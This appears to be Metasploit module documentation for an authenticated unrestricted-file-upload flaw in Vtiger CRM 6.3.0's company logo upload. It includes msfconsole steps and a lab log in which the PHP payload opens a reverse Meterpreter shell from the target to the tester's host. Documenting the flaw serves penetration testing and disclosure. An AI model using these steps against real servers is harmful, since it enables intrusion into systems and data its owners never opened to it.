## Description

Vtiger v6.3.0 CRM's administration interface allows for the upload of a company logo.
The logo upload allows unrestricted file upload and can be used to upload php code,
which can then be executed by requesting the uploaded file location.


## Vulnerable Application

[Vtiger v6.3.0](https://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%206.3.0/Core%20Product/)


## Options

**PHPSHORTTAG**
Specify the use of php short tag, `<? `, for wrapping the payload.
Default: true


## Verification Steps

1. `./msfconsole -q`
2. `use exploit/multi/http/vtiger_logo_upload_exec`
3. `set rhosts <rhost>`
4. `set password <password>`
5. `run`


## Scenarios

### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)

```
msf5 > use exploit/multi/http/vtiger_logo_upload_exec
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899
rport => 8899
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin
password => admin
msf5 exploit(multi/http/vtiger_logo_upload_exec) > run 

[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Uploading payload: KpXAXQNKjN.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500
[+] Deleted KpXAXQNKjN.php

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586
Meterpreter : php/windows
meterpreter >
```
